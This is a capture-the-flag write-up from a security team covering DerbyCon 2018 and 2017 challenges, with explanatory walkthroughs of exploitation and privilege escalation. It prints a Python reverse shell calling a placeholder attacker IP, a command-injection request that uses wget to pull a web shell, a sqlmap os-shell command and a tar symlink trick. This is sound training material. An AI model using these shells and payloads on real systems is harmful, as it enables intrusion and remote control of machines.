
DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.


Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below, and our team spent some time on them with limited success. The mail service allowed user enumeration via the VRFY command, which confirmed susan as a valid user, and it could also be used to send email. Some time was spent using it to send email internally, with no visible result.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We'll be kind to ourselves and say it was potentially due to network stability issues, since the credential pair that eventually proved correct had been passed to the server during multiple earlier brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the installed version of Elasticsearch (API version 1.1.1) which allows for remote code execution. An exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW (CVE-2016-5195), using an exploit variant that adds an account named firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us: it was only discovered in the later part of the CTF and the underlying password was too complex to crack in the time remaining.

Reviewing the box revealed a number of flags; of far greater use, however, was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorized_keys files. One of the more fun flags was saved in the user's home directory at Pictures/Wallpapers/Untitled.png, which was retrieved from the box; VNC was running on localhost and we saw a number of people port forwarding through the box to view it, but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and ARM binaries of varying difficulty. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.

[Screenshot: x64.simple.binary – main function]

We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.

[Screenshot: x64.simple.binary – _AttemptAuthentication function]

It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the user's input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.

Knowing that comparison algorithm, one could reverse it until this challenge's flag was identified. However, under the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.
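
For illustration, a minimal sketch of that filtering step in Python – the reference string and the candidate list below are placeholders, as the real values were lifted straight from the binary:

    # Placeholder values - the real candidates and reference string came from the binary.
    reference = "FredBobNetlive@TED.iomicrosftaol"   # illustrative only
    candidates = [
        "microsoftaolmicrosoftaolFredBobNetlive@TED.io",
        "red.herring.one@aol.com",
        "another.red.herring@live.com",
    ]

    allowed = set(reference)

    for candidate in candidates:
        # The comparison routine never checks the first character of the input,
        # so it is excluded from the test.
        if set(candidate[1:]) <= allowed:
            print("possible flag:", candidate)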

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:

[Screenshot: x64.hard.binary – core functions]

Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating single-byte XOR key: every byte of the file was XOR'ed with a key byte, which was then incremented by 0x07 for the next byte. The original starting key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:

  • superkai64@minecraft.net
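
For reference, a minimal sketch of that brute force in Python – the input file name is illustrative, and the printable-ASCII check is simply one convenient way of spotting the correct key:

    def decode(data: bytes, start_key: int) -> bytes:
        out = bytearray()
        key = start_key
        for b in data:
            out.append(b ^ key)
            key = (key + 0x07) & 0xFF   # the key rotates by 0x07 for every byte
        return bytes(out)

    # The still-encoded contents of the recovered flag.txt (file name illustrative).
    with open("flag.txt.enc", "rb") as f:
        data = f.read()

    for start_key in range(256):
        candidate = decode(data, start_key)
        # Keep anything that decodes to printable ASCII - the real flag stood out immediately.
        if all(32 <= c < 127 for c in candidate.strip(b"\n")):
            print(start_key, candidate)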

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:
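
The exact one-liner isn't reproduced here, but pentestmonkey's Python reverse shell is representative of what can be launched from the Script Console (the IP address and port below are placeholders for our listener):

    # Pentestmonkey-style Python reverse shell - IP and port are placeholders.
    import socket, subprocess, os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.0.0.1", 4444))   # attacker IP and listener port
    os.dup2(s.fileno(), 0)          # stdin
    os.dup2(s.fileno(), 1)          # stdout
    os.dup2(s.fileno(), 2)          # stderr
    subprocess.call(["/bin/sh", "-i"])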

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.
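
The usual trick for upgrading to a full TTY, assuming bash is present on the host:

  • python3 -c 'import pty; pty.spawn("/bin/bash")'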

Access to a root shell was gained by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run less against the syslog file without requiring a password, and less can be escaped to a shell (for example by typing !sh at its prompt). Once a root shell was obtained, the CTF user's password was recovered from the .bash_history file. This user was defined within the sudoers file as having full root permissions. That account allowed us to access the SSH service directly, bypassing the Jenkins service, and gather the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in the context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following request file and fed it into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularly useful as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.
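
As an illustration, the request file and sqlmap invocation were along these lines (the host, session cookie and whether the parameter was sent via POST are assumptions here):

    POST /admin/ajx-addcategory.php HTTP/1.1
    Host: <target>
    Cookie: PHPSESSID=<session>
    Content-Type: application/x-www-form-urlencoded

    catname=test

  • sqlmap -r request.txt -p catname --os-shell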

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path. Apparently there was a WordPress username – djohnston – embedded in the HTML comments somewhere, and that user had a password of Password1 for wp-admin. Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenge included a WordPress-based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we were able to add a semi-colon to terminate the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell, which was then downloaded to the WordPress server using wget.
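
For illustration, the injected request looked something like the following (the attacker address and destination path are placeholders, the script location under wp-admin is an assumption, and URL encoding is omitted for readability):

  • /wp-admin/050416_backup.php?host=127.0.0.1;wget http://<attacker>/shell.php -O /var/www/html/shell.php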

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in the context of the www-data user. After inspecting the groups for this user, we identified that www-data was a member of the sudo group, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the application's MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reverse proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, they were POSTed to the /Login page. This set a cookie called session and then triggered a redirect to /Chat. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookie's value and obtained the following output.
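
A minimal sketch of that decoding step in Python – Base64 is assumed for the parts that decoded cleanly, and the cookie value itself is a placeholder:

    import base64

    cookie = "<value copied from the session cookie>"   # placeholder

    for part in cookie.split(":"):
        try:
            print(base64.b64decode(part))
        except Exception:
            print("(not base64):", part)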

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.
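
A rough sketch of that script – the scoreboard URL, form field names and session handling are all placeholders, since the real submission endpoint isn't reproduced here:

    import time
    import requests

    SUBMIT_URL = "https://scoreboard.example/submit"    # placeholder
    COOKIES = {"session": "<our scoreboard session>"}   # placeholder

    with open("cracked_passwords.txt") as f:
        flags = [line.strip() for line in f if line.strip()]

    for flag in flags:
        r = requests.post(SUBMIT_URL, cookies=COOKIES, data={"flag": flag})
        print(flag, r.status_code)
        time.sleep(1)   # be gentle with the scoreboard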

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of a MAC, utilising some form of strong server side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.

A fantastic example of this is Gabriel Lawrence and Chris Frohoff's ysoserial tool for Java. To understand this concept further, we can't recommend their talk “Marshalling Pickles” enough:

Ruby on Rails has gadgets for RCE via deserialization through ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in, the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definition for IdentLDAP and IdentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment and for this we used https://repl.it – essentially an online code test environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below. This identified two additional hosts, 192.168.252.10 & 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a portscan to find out if any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC, and as such we deployed a SOCKS proxy server on the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel traffic into the target environment from our own hosts. This allowed us to access a number of resources, including connecting to remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. Clicking the link shown below led to a login prompt, which was found to accept the easily guessable credentials helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.


After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator level account on this software and a flag in its own right. We still had to identify the default administrator account name, which some research on the Internet revealed to be root@localhost.


We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One abuses the package manager by uploading a malicious package, resulting in code execution, and the other abuses the PGP key handling, which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921) which affected the PGP keys deployment. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin file and parameters to execute some other binary; in this example we used a simple Python reverse TCP connection.


The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen. However, this didn't yield a flag directly, or at least not without cracking the root password, which we didn't manage before the end of the CTF. It did, however, reveal that the user's password for OTRS was OTRS.


To obtain a full root shell and access the flag, we could have either guessed the flag's location, tar'd the entire root folder, or replaced the /etc/shadow and /etc/passwd files to create a new UID 0 user. We got root access and used PoshC2 for handling our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. As a pre-authenticated user we were able to create a dispute, but in order to find more of the functionality, we needed to be able to login.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let's try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability in the password field. We decided we'd roll with it for the moment and see if anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on the hard side; the report created looked like it contained some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it was that simple; it was indeed possible to change the file extension to PHP, PHP5 and PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing of the viewreport.php page, persist the current entries and then, on every subsequent run, check for any new pages. To persist between runs, a static class with static container members was created. LinqPad can use a new process per run of the script, which would destroy our static container. To ensure that the results were persisted between runs, the following settings were applied (by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂
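
The original script was written in C# in LinqPad; a rough Python equivalent of the same polling-and-diffing idea looks like this (the URL, regex and session details are illustrative):

    import re
    import time
    import requests

    URL = "http://<target>/viewreports.php"                  # placeholder
    COOKIES = {"PHPSESSID": "<authenticated session>"}       # placeholder
    LINK_RE = re.compile(r'viewreport\.php\?rpt=([^"&]+)')   # regex as HTML parser, as promised

    seen = set()
    while True:
        page = requests.get(URL, cookies=COOKIES).text
        current = set(LINK_RE.findall(page))
        for new in sorted(current - seen):
            print("new report:", new)
        seen |= current
        time.sleep(5)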

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the upload of a PHP file that kicked off a PowerShell PoshC2 (https://github.com/nettitude/PoshC2) one-liner, giving us a shell to go searching for the flags.
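
The rename request was along these lines (the attacker share and the IIS web root path are illustrative):

  • /rename.php?old=\\<attacker-ip>\share\shell.php&new=C:\inetpub\wwwroot\shell.php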

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.


Once we had C2 on this host, we discovered it was running as IUSR, which is a low privileged IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities beyond its missing patches. EternalBlue (MS17-010) could have been an option, but this is normally unstable against Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header('Flag: TheBruteForceIsStrongInThisOne');
  • viewreports.php:19:header('Flag: InjectionHeaders');

We also found a file inside the adminscripts folder containing a hint that it was run as a scheduled task every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a high value flag, and picked up another flag from the administrator's desktop.


It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such, we needed to migrate by injecting the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective: download the application, reverse engineer the .NET binary and create a keygen whose output could be submitted back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used ILSpy to decompile the binary, but it generated the following error when trying to decompile the validateLicense function.


We then downloaded the latest version of ILSpy (4.0.0.4319-beta2), which successfully decompiled the code back to C#.


The first section of the code took the user's first name and MD5 hashed that value. It then took the first eight characters of the resulting hash and used them in the next part of the code. It also had a static string that it used as part of the keygen creation (Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.
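
For illustration only, the rough shape of the keygen in Python – note that the exact way the MD5 prefix and the static string were combined (and any further formatting the real code applied) is an assumption here rather than a faithful reproduction of the decompiled C#:

    import hashlib

    STATIC = "Kc5775cK"   # static string taken from the decompiled binary

    def make_key(first_name: str) -> str:
        digest = hashlib.md5(first_name.encode()).hexdigest()
        prefix = digest[:8]        # first eight characters of the MD5 hash
        return prefix + STATIC     # combination order is an assumption

    print(make_key("Bob"))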

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

DerbyCon 2017 CTF Write Up

The excellent Derbycon 2017 has just come to an end and, just like last year, we competed in the Capture The Flag competition, which ran for 48 hours from noon Friday to Sunday. As always, our team name was SpicyWeasel. We are pleased to say that we finished in first place, which netted us a black badge.

We thought that, just like last year, we'd write up a few of the challenges we faced for those who are interested. A big thank you to the DerbyCon organizers, who clearly put a lot of effort into delivering a top quality and most welcoming conference.

Edit: We have just released the DerbyCon 2018 CTF Write Up


Facespace

Navigating to this box, we found a new social media application that calls itself "The premiere social media network, for tinfoil hat wearing types". We saw that it was possible to create an account and log in. Further, on the left hand side of the page it was possible to view profiles for those who had already created an account.

Once we had created an account and logged in, we were redirected to the page shown below. Interestingly, it allowed you to upload tar.gz files, and tar files have some interesting properties… By playing around with the site, we confirmed that uploaded tar files were indeed untarred and their contents written out to the /users/ path.

One of the more interesting properties of tar is that, by default, it doesn't follow symlinks; rather, it adds the symlink itself to the archive. In order to archive the target file rather than the symlink, you can use the -h or --dereference flag, as shown below.

Symlinks can point to both files and directories, so to test if the page was vulnerable we created an archive (sketched after this list) pointing to:

  • the /root dir
  • /etc
  • the known_hosts file in /root/.ssh (on the off chance…)
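
A minimal sketch of building such an archive with Python's tarfile module, which (like tar itself) stores symlinks as symlinks unless told to dereference them; the archive and link names are illustrative:

    import os
    import tarfile

    # Symlinks pointing at what we want to read once the server extracts the archive.
    os.symlink("/root", "root")
    os.symlink("/etc", "etc")
    os.symlink("/root/.ssh/known_hosts", "known_hosts")

    # dereference defaults to False, so the symlinks themselves end up in the archive.
    with tarfile.open("profile.tar.gz", "w:gz") as tar:
        for name in ("root", "etc", "known_hosts"):
            tar.add(name)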

The upload was successful and the tar was extracted.

Now to find out if anything was actually accessible. By navigating to /users/zzz/root/etc/passwd we were able to view the passwd file.

Awesome – we had access. We stuck the hash for rcvryusr straight into hashcat and it wasn’t long before the password of backup was returned and we were able to login to the box via SSH.

We then spent a large amount of time attempting privilege escalation on this Slackware 14.2 host. The organisers let us know, after the CTF had finished, that there was no privilege escalation. We thought that we would share this with you, so that you can put your mind at rest if you did the same!

JitBit

Before we proceed with this portion of the write up, we wanted to note that this challenge was a 0day discovered by Rob Simon (@_Kc57) – props to him! After the CTF finished, we confirmed that there had been attempted coordinated disclosure in the preceding months. The vendor had been contacted and failed to provide a patch after a reasonable period had elapsed. Rob has now disclosed the vulnerability publicly and this sequence of events matches Nettitude’s disclosure policy. With that said…

We hadn’t really looked too much at this box until the tweet below came out. A good tip for the DerbyCon CTF (and others) is to make sure that you have alerts on for the appropriate Twitter account or whatever other form of communication the organizers may decide to use.

Awesome – we have a 0day to go after. Upon browsing to the .299 website, we were redirected to the /KB page. We had useful information in terms of vendor and a version number, as highlighted below.

One of the first things to try after obtaining a vendor and version number is to attempt to locate the source code, along with any release notes. As this was a 0day there wouldn’t be any release notes pointing to this issue. The source code wasn’t available, however it was possible to download a trial version.

We downloaded the zip file and extracted it. Happy days – we found it was a .NET application. Anything .NET we find immediately has a date with a decompiler. The one we used for this was dotPeek from JetBrains (https://www.jetbrains.com). There are a number of different decompilers for .NET (dnSpy being a favourite of a lot of people we know) and we recommend you experiment with them all to find one that suits you.

By loading the main HelpDesk.dll into dotPeek, we were able to extract all the source from the .dll by right clicking and hitting Export to Project. This drops all the source code that can be extracted into a folder of your choosing.

Once the source was exported, we quickly ran it through Visual Code Grepper (https://github.com/nccgroup/VCG) which:

“has a few features that should hopefully make it useful to anyone conducting code security reviews, particularly where time is at a premium“

Time was definitely at a premium here, so in the source code went.

A few issues were reported, but upon examining them further, they were all found to be false positives. The LoadXML result was particularly interesting: although XmlDocument is vulnerable to XXE injection in all but the most recent versions of .NET, the vendor had correctly nulled the XmlResolver, mitigating the attack.

A further in depth review of the source found no real leads.

The next step was to look through all the other files that came with the application. Yes we agree that the first file we should have read was the readme but it had been a late night!

Anyway, the readme. There were some very interesting entries within the table of contents. Let’s have a further look at the AutoLogin feature.

The text implies that by creating an MD5 hash of the username + email + shared-secret, it may be possible to login as that user. That’s cool, but what is the shared secret?

Then, the tweet below landed. Interesting.

We tried signing up for an account by submitting an issue, but nothing arrived. Then, later on another tweet arrived. Maybe there was something going on here.

So, by creating an account and then triggering a Forgotten Password for that account, we received this email.

Interesting – this is the Autologin feature. We really needed to look into how that hash was created.

At this point we began looking into how the URL was generated and located the function GetAutoLoginUrl(), which was within the HelpDesk.BusinessLayer.VariousUtils class. The source of this is shown below.

As stated in the readme, this is how the AutoLogin hash was generated: by appending the username, the email address and, in this case, the month and day. The key here was really going to be that SharedSecret. We were really starting to wonder at this point, since the only way to obtain that hash was via email.

The next step was to try and understand how everything worked. At this point we started Rubber Ducky Debugging (https://en.wikipedia.org/wiki/Rubber_duck_debugging). We also installed the software locally.

Looking in our local version, we noticed that you can't change the shared secret in the trial. Was it the same between versions?

One of the previous tweets started to make sense too.

The KB article leaked the username and email address of the admin user. Interesting, although it was possible to obtain the email address from the sender and, well, the username was admin…

We tried to build an AutoLoginUrl using the shared secret from our local server with no joy. Okay. Time to properly look at how that secret was generated.

Digging around, we eventually found that the AutoLoginSharedSecret was initialised using the following code.

This was looking promising. While the shared secret this code generated was long enough, the code made some critical errors that left the secret recoverable.

The first mistake was to drastically narrow the key space; uppercase A-Z plus the digits 2-9 is not a large character set.

The second mistake was with the use of the Random class:

This is not random in the way the vendor wanted it to be. As the documentation states below, providing the same seed will produce the same sequence. The seed is a 32-bit signed integer, meaning that there will only ever be 2,147,483,647 combinations.

In order to recover the key, the following C# was written in (you guessed it!) LinqPad (https://www.linqpad.net/).

The code starts with a counter of 0 and then seeds the Random class with it, generating every possible secret. Each of these secrets is then hashed with the username, email, day and month to see if it matches the hash recovered from the forgotten password email.

Once the code was completed it was run and – boom – the secret was recovered. We should add that there was only about 20 mins to go in the CTF at this stage. You could say there was a mild tension in the air.

This was then used to generate a hash and autologin link for the admin user. We were in!

The flag was found within the assets section. We submitted the flag and the 8000 points were ours (along with another challenge coin and solidified first place).

We could finally chill for the last 5 mins and the CTF was ours. A bourbon ale may have been drunk afterwards!

Turtles

